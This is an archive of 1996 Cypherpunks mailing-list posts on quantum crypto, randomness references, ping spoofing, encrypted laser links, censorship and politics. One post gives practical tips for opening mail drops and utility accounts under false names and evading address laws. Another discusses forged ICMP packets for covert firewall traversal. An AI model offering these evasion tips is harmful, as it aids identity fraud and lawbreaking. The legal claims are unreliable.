censure ALL of the dozen-or-so packet stations which had automatically 
forwarded the offending message.

Great alarm was raised in the packet community, and I believe it was the 
ARRL which enlightened the FCC that enforcement in such a manner would 
destroy packet radio by requiring each message to be manually inspected 
prior to retransmission - an obvious impracticality.  (Even though the 
letter of the law may have permitted such a strict enforcement by the FCC.)

In the end, only the ORIGINATOR of the message was "punished."

-Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexandra Griffin <acg@mandrake.cen.ufl.edu>
Date: Mon, 19 Feb 1996 02:47:07 +0800
To: cypherpunks@toad.com
Subject: Re: Science News - article on Quantum Crypto
In-Reply-To: <v02120d06ad48d5e6491a@[199.0.65.105]>
Message-ID: <199602181818.NAA21065@mandrake.cen.ufl.edu>
MIME-Version: 1.0
Content-Type: text


Bob writes:

> Does anyone know if the new in-line optical amplifiers (not switches!) have
> any effect on quantum crypto messages?

Yes, any active devices in your communications path would be unable to
function without making some kind of classical measurement on the
photons involved (e.g. measuring phase relative to a definite test
angle, if phase is what's being modulated), thereby collapsing the
wavefunction and spoiling any special properties afforded by being
able to send photons down the line without "looking at them."  Optical
repeaters have to pass your signal through an intermediate electronic
stage anyway, since we have no purely optical valve/transistor
equivalents (bosons don't interact with each other at all).

Can someone think of a reason why this wouldn't necessarily be so?

> Cheers,
> Bob Hettinga

- alex




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 19 Feb 1996 02:46:05 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: PING packets illegal?
In-Reply-To: <199602181745.JAA08949@ix5.ix.netcom.com>
Message-ID: <199602181819.NAA10431@homeport.org>
MIME-Version: 1.0
Content-Type: text


Bill Stewart wrote:

| >From a legal perspective, it's tough to assert that the US user had scienter,
| given that it pings scarcely reach the machine's consciousness, much less
| the human users', since they're handled by ICMP rather than by a user-space
| TCP or UDP
| socket.  (Obviously, if there's a sniffer around this is slightly different.)
| 
| Is it possible to send out forged ping packets, pinging machine B with a From
| address of C (fake) instead of A (real), so that Alice can talk to China via
| Bob?
| If so, it might be an interesting method for traversing some firewalls,
| and also (if you write a ping-collector program) for back-channel
| communications.

It should be possible to fake a source address.

Also, if you want to traverse a firewall from the inside, its usually
pretty easy to do with mail, or over telnet.  Stego in ping would show
up in a firewalls logs more prominently than a lot of mail.

| If you want to really abuse the protocols, 53 bytes probably fits into the
| 64 you can send in a ping, so you could implement ATM-over-ICMP :-)

Err, you can put up to 1500 bytes into an ICMP echo request, if its
properly implemented.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 19 Feb 1996 02:56:04 +0800
To: cypherpunks@toad.com
Subject: Re: Patents suck
Message-ID: <9602181823.AA20368@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>I take some disagreement with that.
>
>With patents, there is a problem of large companies owning them yet
>doing nothing with them except suing other companies or individuals.

If you reject that possibility, you imply that the result of your work 
for yourself might not be your own property.  It does not matter if the
idea patented was originated be the patent holder of was purchased by the
patent holder.  Money is equivalent to personnal work.

And the property rights *are* fundamentals (even if not implemented in 
Biiieauuuutifull Canada...).

You can not have your cake and eat it too...


>Patents would be better if there was a good-faith attempt on the
>part of the holder to "use it or lose it".  Somebody sitting on a
>patent and doing nothing with it deserves to lose it after a number
>of years.

AFAIK, such clause already exists in Canada.  But again, I am not a layer.

JFA
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 19 Feb 1996 05:49:48 +0800
To: Duncan Frissell <cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602182116.NAA21283@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:56 PM 2/18/96 -0500, Duncan Frissell wrote:
>At 06:13 AM 2/16/96 -0500, lmccarth@cs.umass.edu wrote:
>>I'd be interested to see the documentation of the number of peasants in 
>>the U.S. (or elsewhere) who have done anything like this. Documentation of
>>the number of peasants who could manage the technical details would also
>>be interesting.
>
>Actually, it only takes a million or so out of the world population to make
>restrictions impossible.  That will certainly be achievable. ...

My wife attended the World Women's Conference in Hai Rou, China (as staff
supporting their Apple computers).  She reports that the "killer
application" demonstrated there was email.  Women in extreemly poor
countries of the world were interested in communicating with each other
about solving local problems (e.g. Clean water supplies).

The demand is there.  These people are not stupid.  They can learn.  I
expect to see the village email computer build on "obsolete" donated
machines start to become a force in the next century, the same way the
village TV and cassette player have played a role in the last decade.

Regards - Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Feb 1996 06:36:40 +0800
To: Alexandra Griffin <cypherpunks@toad.com
Subject: Re: Science News - article on Quantum Crypto
Message-ID: <m0toGdW-00092jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


At 01:18 PM 2/18/96 -0500, Alexandra Griffin wrote:
>Bob writes:
>
>> Does anyone know if the new in-line optical amplifiers (not switches!) have
>> any effect on quantum crypto messages?
>
>Yes, any active devices in your communications path would be unable to
>function without making some kind of classical measurement on the
>photons involved (e.g. measuring phase relative to a definite test
>angle, if phase is what's being modulated), thereby collapsing the
>wavefunction and spoiling any special properties afforded by being
>able to send photons down the line without "looking at them."  Optical
>repeaters have to pass your signal through an intermediate electronic
>stage anyway, since we have no purely optical valve/transistor
>equivalents (bosons don't interact with each other at all).

I love to be picky about such things.  Yes, I think bosons _DO_ interact 
with each other.  Before all you physics nerds flame me, hear me out:  
Photons, while they have no "rest mass" do indeed "gravitate" (they are 
energy, recall?).  In a reference I can no longer find in my 1970 
Encyclopedia Brittanica, it stated that a cubic mile of sunshine "weighs" 
1/100,000,000 of a milligram.    From another source (or maybe the same 
one?) it stated that the photon "weight" in a cubic centimeter of volume at 
the core of a star such as our sun (or at the core of a nuclear explosion) 
is about 1 gram per cubic centimeter.

Thus, presumably photons self-gravitate, and thus, SOME bosons "interact," 
although admittedly this kind of interaction is a few dozen orders of 
magnitude lower than what you probably intended when you said "Bosons don't 
interact with each other at all."

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSeY6fqHVDBboB2dAQG7XwQAoGeWJgkUf2Ton5ptuAgps23RN1YVrdS8
MB0t9DIRrmCqNlFOf8c5b3I9ljxpY0JvEMyWG0LYVqp6+ZYBfBwaSEQ9YGI+uzRJ
vDIWg/83sBlHDraNiV5f6VBjZNExgvk2N4j1FIploB0SFOBEH3W7ymVa6Z/IZ6fs
kYaIKiXp+ns=
=YPqX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 19 Feb 1996 04:28:28 +0800
To: cypherpunks@toad.com
Subject: Re: True random numbers
Message-ID: <Pine.BSD.3.91.960218131947.11216A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
                            (1) 
 
 
  The Centre de Recherches Mathematique is hosting a year-long 
  program in combinatorics and group theory in 1996-1997.  The 
  year will be organized around a number of workshops spread 
  throughout the year. 
 
  Among the workshops: 
 
 
        WORKSHOP ON PSEUDORANDOM NUMBER GENERATION 
 
                       06 03 / 28 96 
 
 
  The CRC's at the University of Montreal. 
 
  Details: 
 
               ACTIVITIES@CRM.UMontreal.CA 
  
                          or 
 
               http://www.CRM.UMontreal.CA 

 
 
                           (2) 
 
 
  If you'd like to read RFC 1750, "Randomness Recommendations 
  for Security," but you're too busy to ftp, email 
 
                mailserv@ds.internic net 
 
 
  and in the body of the message include the command 
 
                document-by-name rfc1750 
 
 
  In due time it will arrive in 2 parts. 
 
  At the end of the 2d part: 
 
  References

   [ASYMMETRIC] - Secure Communications and Asymmetric Cryptosystems,
   edited by Gustavus J. Simmons, AAAS Selected Symposium 69, Westview
   Press, Inc.

   [BBS] - A Simple Unpredictable Pseudo-Random Number Generator, SIAM
   Journal on Computing, v. 15, n. 2, 1986, L. Blum, M. Blum, & M. Shub.

   [BRILLINGER] - Time Series: Data Analysis and Theory, Holden-Day,
   1981, David Brillinger.

   [CRC] - C.R.C. Standard Mathematical Tables, Chemical Rubber
   Publishing Company.

   [CRYPTO1] - Cryptography: A Primer, A Wiley-Interscience Publication,
   John Wiley & Sons, 1981, Alan G. Konheim.

   [CRYPTO2] - Cryptography:  A New Dimension in Computer Data Security,
   A Wiley-Interscience Publication, John Wiley & Sons, 1982, Carl H.
   Meyer & Stephen M. Matyas.

   [CRYPTO3] - Applied Cryptography: Protocols, Algorithms, and Source
   Code in C, John Wiley & Sons, 1994, Bruce Schneier.

   [DAVIS] - Cryptographic Randomness from Air Turbulence in Disk
   Drives, Advances in Cryptology - Crypto '94, Springer-Verlag Lecture
   Notes in Computer Science #839, 1984, Don Davis, Ross Ihaka, and
   Philip Fenstermacher.

   [DES] -  Data Encryption Standard, United States of America,
   Department of Commerce, National Institute of Standards and
   Technology, Federal Information Processing Standard (FIPS) 46-1.
   - Data Encryption Algorithm, American National Standards Institute,
   ANSI X3.92-1981.
 
   (See also FIPS 112, Password Usage, which includes FORTRAN code for
   performing DES.)

   [DES MODES] - DES Modes of Operation, United States of America,
   Department of Commerce, National Institute of Standards and
   Technology, Federal Information Processing Standard (FIPS) 81.
   - Data Encryption Algorithm - Modes of Operation, American National
   Standards Institute, ANSI X3.106-1983.

   [D-H] - New Directions in Cryptography, IEEE Transactions on
   Information Technology, November, 1976, Whitfield Diffie and Martin
   E. Hellman.

   [DoD] - Password Management Guideline, United States of America,
   Department of Defense, Computer Security Center, CSC-STD-002-85.
 
   (See also FIPS 112, Password Usage, which incorporates CSC-STD-002-85
   as one of its appendices.)

   [GIFFORD] - Natural Random Number, MIT/LCS/TM-371, September 1988,
   David K. Gifford

   [KNUTH] - The Art of Computer Programming, Volume 2: Seminumerical
   Algorithms, Chapter 3: Random Numbers. Addison Wesley Publishing
   Company, Second Edition 1982, Donald E. Knuth.

   [KRAWCZYK] - How to Predict Congruential Generators, Journal of
   Algorithms, V. 13, N. 4, December 1992, H. Krawczyk

   [MD2] - The MD2 Message-Digest Algorithm, RFC1319, April 1992, B.
   Kaliski
 
   [MD4] - The MD4 Message-Digest Algorithm, RFC1320, April 1992, R.
   Rivest
 
   [MD5] - The MD5 Message-Digest Algorithm, RFC1321, April 1992, R.
   Rivest

   [PEM] - RFCs 1421 through 1424:
   - RFC 1424, Privacy Enhancement for Internet Electronic Mail: Part
   IV: Key Certification and Related Services, 02/10/1993, B. Kaliski
   - RFC 1423, Privacy Enhancement for Internet Electronic Mail: Part
   III: Algorithms, Modes, and Identifiers, 02/10/1993, D. Balenson
   - RFC 1422, Privacy Enhancement for Internet Electronic Mail: Part
   II: Certificate-Based Key Management, 02/10/1993, S. Kent
   - RFC 1421, Privacy Enhancement for Internet Electronic Mail: Part I:
   Message Encryption and Authentication Procedures, 02/10/1993, J. Linn

   [SHANNON] - The Mathematical Theory of Communication, University of
   Illinois Press, 1963, Claude E. Shannon.  (originally from:  Bell
   System Technical Journal, July and October 1948)

   [SHIFT1] - Shift Register Sequences, Aegean Park Press, Revised
   Edition 1982, Solomon W. Golomb.

   [SHIFT2] - Cryptanalysis of Shift-Register Generated Stream Cypher
   Systems, Aegean Park Press, 1984, Wayne G. Barker.

   [SHS] - Secure Hash Standard, United States of American, National
   Institute of Science and Technology, Federal Information Processing
   Standard (FIPS) 180, April 1993.

   [STERN] - Secret Linear Congruential Generators are not
   Cryptograhically Secure, Proceedings of IEEE STOC, 1987, J. Stern.

   [VON NEUMANN] - Various techniques used in connection with random
   digits, von Neumann's Collected Works, Vol. 5, Pergamon Press, 1963,
   J. von Neumann.
 
 
  Of course you'd get the 2d edition of Schneier's Applied 
  Cryptography. 
 
  Something a little different at the introductory level: 
 
 
      J C G Lesurf 
       Physics and Astronomy Department 
       University of St Andrews 
       Scotland 
 
      Information and Measurement 
 
      Institute of Physics Publishing 
       US Editorial Office 
       The Public Ledger Building    Suite 1035 
       Independence Square 
       Philadelphia  PA    19106 
 
      1995 
 
      ix + 243 
 
      ISBN: 0 7503 0308 5 
 
 
 
  Cordially, 
 
  Jim 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 19 Feb 1996 04:15:39 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <2.2.32.19960218195648.009940e8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:13 AM 2/16/96 -0500, lmccarth@cs.umass.edu wrote:

>> I'm waiting.  Then I'll have to call all the way to Montreal to log on.
>
>So much for the-net-as-I-know-it, where people don't have to call outside
>the country just to log in to the net. Most of the people I want on the net
>are very unlikely to do this.

But what we think of as "phone calls" are likely to be digital and flat rate
as well so calling distant points won't involve much of a hit.

>I'd be interested to see the documentation of the number of peasants in 
>the U.S. (or elsewhere) who have done anything like this. Documentation of
>the number of peasants who could manage the technical details would also
>be interesting.

Actually, it only takes a million or so out of the world population to make
restrictions impossible.  That will certainly be achievable.  Configuration
need not be difficult if the technically aware produce easy installation
software and  I think this is being done.  In any case, once Windows
96/Windows NT is stable enough with genuine multithreading we'll be able to
do a nice background TCP/IP setup with a point and click interface.  If the
capability to do something people want to do (communicate freely) exists, it
*will* be used.  Enforcement doesn't work.  The Great Enemy would need to
remove the capability.  But they are not doing that.  They are encouraging
the move towards a more communications rich environment not towards a lesser
one.

>And of course, all peasants have plenty of disposable income to spend on
>long-distance phone charges....

No more long distance.  Haven't you heard.  The "production cost" of a New
York to London call is currently less than 2 cents a minute (most of that
for billing) AT&T charges about 50-100 cents a minute.  That sort of markup
can't survive.

>Duncan Frissell writes:
>> We (some of we) don't want the housing or the school funding either.  I
>> certainly consider slave schools to be the most common form of child abuse
>> in the world today.
>
>That's nice, but are you seriously claiming that the portion of the average
>set of voters in a Congressional district that strongly agrees with you on 
>those issues matters a whit in a Congressional election ?

No.  But I do claim that their view doesn't mean much in an age in which
politics is being replaced by markets.

Look.  Coercion-based systems like government depend on a power balance
tipped far in their direction.  They start to break down as individuals and
small groups gain levels of power that are more equal to theirs.  If we can
overturn one of their commands with five minutes of keyboarding, that
command can't stand.  The stability of past systems was based on the fact
that 90% of the population couldn't do anything no matter what happened.
They had to stay where they were and grow food or they would starve.  It's
not hard to rule people in that situation.  We aren't in that situation any
more.  We can move and communicate and buy and sell and the government can't
do much about most of it.  They depend on our acquiescence and the freedom
of communication we have weakens their hold on that acquiescence.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Sun, 18 Feb 1996 22:38:48 +0800
To: cypherpunks@toad.com
Subject: Re: Computer unmasks Anonymous writer...
In-Reply-To: <autopost.824644887.780@ulf.mali.sub.org>
Message-ID: <m0to9e7-00009mC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>in the Mathematics Department took part in a statistical analysis of the 
>Letters of Junius, which appeared anonyously in the Morning Advertiser in 
>London in the early 1760s.  They were ascribed to almost every writer of 

You can find some more information by searching for "stylometry" or
"forensic stylometry" on the net, and probably more in libraries.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maruishi@netcom.com
Date: Mon, 19 Feb 1996 07:38:12 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: True random numbers
In-Reply-To: <Pine.BSD.3.91.960218131947.11216A-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.3.89.9602181546.A11456-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


thanx a lot for that info..... 

maruishi@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Feb 1996 08:35:42 +0800
To: SINCLAIR  DOUGLAS N <dsmith@midwest.net (David E. Smith)
Subject: Re: Using lasers to communicate
Message-ID: <m0toIW1-0008zJC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:44 PM 2/17/96 -0500, SINCLAIR  DOUGLAS N wrote:
>> If you have a secure link you don't need encryption.  Arguably, the
>> converse is true; if you have secure encryption you don't need
>> a secure link.  Isn't the ability to transmit secure data over
>> insecure channels one of the primary justifications for encryption?
>> 
>
>Of course.  My point, though I seem to have failed to state it,
>is that encryption is a cheap software thing while laser beams
>are expensive, complicated, and still not secure.

I tend to agree.  But my position is a bit more "middle of the road":  We 
_should_ use laser/LED links, but we should encrypt the link with encryption 
sufficiently strong (IDEA/1024-bit RSA key) to make interception of the beam 
pointless.

I think what's needed from the IC companies is a chip somewhat analogous to 
the UARTS (TR1602/AY5-1013) (which were "new" in about the 1975 time frame), 
but one which maintains one half of a bidirectional link with NSA-proof 
encryption.  It wouldn't matter what the physical medium was, it would 
"handle it."  They'd be given "authority" over link signal amplitude, and 
would be able to monitor link integrity/error rate to anticipate incipient 
link failures.  (caused by electronic/mechanical  failure, growth of 
vegetation, corrosion, and other items.)  (I know, I know, shades of 2001!  
"Open the pod bay door, Hal!")

During periods of low usage, it would occasionally automatically engage in 
link margin testing, etc, and automatically generate/transmit extremely-long 
period pseudorandom data to  prevent snoopers from doing any sort of
traffic-density analysis 
on the working link.  If the chip was given mechanical authority over 
beam-pointing, the chip could also do auto-align test functions to
compensate for 
misalignment, etc.  Alignment would be kept "perfect."

While I'm no IC-design expert, considering the fact that chips commonly 
possess at least 1000 times as many transistors as they did in 1974, they 
SHOULD be able to implement such a chip easily enough.

Lazy bastards.

Jim Bell
jimbell@pacifier.com



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSezPPqHVDBboB2dAQGu1gP+J1t3aagiHVoSE0ETiid2TPYw1wCBxi5H
znvWIHbic9VNMnBo1ZkeSiR86Xi/C311CB526vRZnzNyUNuk8vF55MxGY7FRf1sn
xGvH0n+b3Y4XR3NsJP0cazLhmDZocjTTjiRDGMSFt4wwLt0SqiLbrxQ/WkcB6ee+
/17ORpzAafk=
=klc5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 19 Feb 1996 04:54:09 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: CDA Yes Votes; Collection
Message-ID: <2.2.32.19960218204024.00b89dc8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:54 PM 2/16/96 -0800, Simon Spero wrote:
>So, if the US were to end up with a President Buchanan elected by 25% of 
>all eligible voters, would you advocate seeking exile, or armed rebellion?

Well, few rebelled or left when William Jefferson Blythe Clinton won with
23% of the eligible vote.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Feb 1996 09:16:38 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Science News - article on Quantum Crypto
Message-ID: <m0toIyO-00090QC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:01 PM 2/18/96 -0800, Timothy C. May wrote:
>At 9:28 PM 2/18/96, jim bell wrote:
>
>>I love to be picky about such things.  Yes, I think bosons _DO_ interact
>>with each other.  Before all you physics nerds flame me, hear me out:
>
>I won't "flame you," just correct you.

Hmmmm.  Last thing I saw, you claimed you put me in your "killfile."  Glad 
to see I'm off.  (This makes me wonder why...)   Hope I don't do anything 
else to offend you. B^)

>It is well-known that photons are affected by gravitation...from the
>Mossbauer effect

Hey, you're a sharp guy!  Not too many people are aware of the Mossbauer 
effect.  I'll bet you read the same Scientific American article I did, 
decades ago.  Here's a question:  How hard is 
it to make a gamma detector?  I'd like to experiment with the Mossbauer 
effect, but aside from the difficulty of obtaining the radioactive nuclides, 
I don't know to make a crystal detector.  And is that the best an amateur 
could do?

> to the bending of light by the sun (seen in eclipses) to
>the gravitational lensing effects.
>
>....
>>Thus, presumably photons self-gravitate, and thus, SOME bosons "interact,"
>>although admittedly this kind of interaction is a few dozen orders of
>>magnitude lower than what you probably intended when you said "Bosons don't
>>interact with each other at all."
>
>What is being referred to is a term of art related to Bose-Einstein
>statistics (the origin of the term boson, as contrasted to fermions, which
>are affected by the Pauli Exclusion Principle, while bosons are not).

Yes, yes, yes, I know this stuff.  But my pickiness was based on the fact 
that the term "interact" can vary over many orders of magnitude.  For 
example, as I recall the ratio of the electrical repulsion  between two 
protons exceeds the gravitational attraction by a factor of about 10**40.  I 
just object to the use of the term "interact" in a cavalier way, as if 
quantum mechanical "interaction" was the only kind of interaction that 
"mattered."  (no pun intended...well, maybe just a little.) 

>No list relevance that I can see, but then neither do nuclear triggers have
>anything to do with the list.

Okay, maybe not, but my idea is substantially better than anything I've 
heard published in the open lay press.  I just heard from a friend that even 
that hack Clancy used krytrons and capacitors; my system would use _trivial_ 
components to do the timing.  

Jim Bell, N7IJS


jimbell@pacifier.com

Klaatu Burada Nikto


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSe8AfqHVDBboB2dAQFUQwP/fcsCsqydcEFdxnBqWuFeFrqoumUtg5NR
5SSTPs1dX7SZ2A1eBNo1Up9JodqShnJtce464rrW7kleX5bHSGG5mY327D1X9+Nw
O/UcI7yfKdHidUK7Z7YUn5zeBnZzVqsTStXPX4SECg8bfvo9Ey/OjEQ/bVi0Qi4C
fiwJD8skIE4=
=DaGm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 19 Feb 1996 07:01:17 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Science News - article on Quantum Crypto
Message-ID: <ad4ce96a0502100436fc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:28 PM 2/18/96, jim bell wrote:

>I love to be picky about such things.  Yes, I think bosons _DO_ interact
>with each other.  Before all you physics nerds flame me, hear me out:

I won't "flame you," just correct you.

It is well-known that photons are affected by gravitation...from the
Mossbauer effect to the bending of light by the sun (seen in eclipses) to
the gravitational lensing effects.

....
>Thus, presumably photons self-gravitate, and thus, SOME bosons "interact,"
>although admittedly this kind of interaction is a few dozen orders of
>magnitude lower than what you probably intended when you said "Bosons don't
>interact with each other at all."

What is being referred to is a term of art related to Bose-Einstein
statistics (the origin of the term boson, as contrasted to fermions, which
are affected by the Pauli Exclusion Principle, while bosons are not).

No list relevance that I can see, but then neither do nuclear triggers have
anything to do with the list.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Mon, 19 Feb 1996 05:55:45 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: CDA Yes Votes; Collection
Message-ID: <v02120d01ad4d4ba668a0@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 3:40 PM 2/18/96, Duncan Frissell wrote:

>Well, few rebelled or left when William Jefferson Blythe Clinton won with
>23% of the eligible vote.

        This fact seems to pique you, Duncan, as though it were somehow
unjust. If you feel so strongly, maybe you should get out and organize
those oceans of people who're waiting to think and vote just like you do.
Or is "organizing" too gauche for your finer sensibilities?
        I'm no fan of the man myself, but he _did_ win.
        Don't like it? Change it.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 19 Feb 1996 06:20:14 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: CDA outside US (Including Indian Reservations)
Message-ID: <v02140b01ad4c8b910e88@[165.254.158.226]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:08 2/17/96, Ed Carp wrote:

>Another problem - if you ever want to get into the US, you can kiss that
>chance goodbye.  They might not even let you into the country as a
>visitor.  Stupid.  A fair number of Western countries have laws that say,
>in effect, that if you do something in your country that isn't illegal in
>your country but is in country X, then country X can bar you entry or PR
>status or citizenship based on the fact that is *is* a crome in country X.

Of course there are other Western Countries that will let you in with the
intent of Arresting you (and possibly extradite you to a 3rd Country since
you are not Guilty of anything in the Extraditing Country except for being
on the 3rd Country's "Wanted List". There was a big stink a while ago about
someone being shipped to Germany on one of these International Pick-Up
Warrants.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Feb 1996 06:22:11 +0800
To: cypherpunks@toad.com
Subject: Gustave Solomon
Message-ID: <199602182159.QAA15216@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Mathematician Gustave Solomon died on January 31 in Los
   Angeles. He was 65. Dr. Solomon was a co-inventor with
   Irving S. Reed of the Reed-Solomon codes, which have come
   into increasingly widespread use as a way of combatting the
   inevitable errors that occur in the transmission and
   storage of information. He did early work concerning the
   algebraic theory of error-correcting codes, and, with H. F.
   Mattson, was co-author of the powerful tool for analyzing
   such codes known as the Mattson-Solomon polynomial. His
   other interests included composing popular songs and
   folksongs and teaching voice and movement.

   Excerpted from NYT obituary, February 18, 1996.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Morgan <sean@lucifer.com>
Date: Mon, 19 Feb 1996 08:47:57 +0800
To: cypherpunks@toad.com
Subject: Re: True democracy in America.
Message-ID: <2.2.32.19960219002159.00681c98@lucifer.com>
MIME-Version: 1.0
Content-Type: text/plain


Isaac Hopkins <Isaac.C.Hopkins-1@tc.umn.edu> wrote:

>A truly Democratic society is only feasible when you have an educated
>society that can act outside of their own self interest [...] A democracy
>is just the tyranny of the majority.

Democracy works because it recognizes the power of a majority.  If a
leader's policies are at odds with the will of the majority, sooner or later
they will rise up against him/her.  If you will allow me to throw a cliche
back at your "tyranny of the majority", how about "might makes right"?  Or
as Churchill said (more or less), "Democracy is the worst possible form of
government, except for all the others."

Notice that "might makes right" does not imply that any education is necessary.
-------------------------------+-----------------------------------------
Sean Morgan (sean@lucifer.com) | Let me tell you a few bits about myself:  
                               |   CACTTGCCGGGTAACACTCCATGAAATTCTTCTCAGCC
http://www.lucifer.com/~sean/  |   AGGTGTCGACGCTAGGATCAACCTTTAAGTGAACT...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 19 Feb 1996 06:51:59 +0800
To: cypherpunks@toad.com
Subject: Re: Ben T. Moore "Mr. Anonymous"
Message-ID: <2.2.32.19960218222556.00d635bc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 2/14/96 -0800, hochiminh@alpha.c2.org wrote:

>So while you are off being a cool anonymous dude the rest of us are paying
for >the AFDC you ex-wife has to use to feed the kids.

No individual is responsible for the fact that AFDC exists and steals wealth
from others.  The government and its supporters are responsible for that
crime.  
>This is a violation of Indiana Code but breaking the law is of no concern
to you, huh?

Hardly ever prosecuted.  In addition, if you use a mail drop for a DMV
address and the authorities ever "call" you on it, you can use the Homeless
Defense.  As far as I know, the homeless have the right to drive.  Also, if
your license/registration is in a jurisdiction other than the one in which
you find yourself, your "lies" to the foreign jurisdiction do not violate
local law.

>This [opening a mail drop in a false name] is a violation of Indiana and
>Federal Laws depending on how they are used.

Has never been prosecuted.  Very hard to prove in any case since the mailbox
clerk is unlikely to remember the person who opened the box account and if
you are really worried, you can just add a second phony name to the first
name without any false ID having to be presented.  You can then collect mail
under the second name and ignore the name in which the account was opened.

>Another violation of Indiana Code [opening utility accounts in false names].

I doubt that if there is no intent to defraud (hide bad credit for example).
If you can later prove that your credit was good and the account would have
been opened in any case, then there is no misrepresentation of a material
fact and you can fall back on the common law right to call yourself by any
name you choose.  No prosecutions in any case.

It never ceases to amaze me that people invoke never used laws to try and
control the behavior of others.  Did you know that sodomy is illegal in
(circa) 22 states?  Does this reduce the incidence of same.  Use it or lose it.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 19 Feb 1996 08:42:19 +0800
To: cypherpunks@toad.com
Subject: Turkey says: "But even the U.S. censors its Net!"
Message-ID: <ad4d02fe08021004393f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


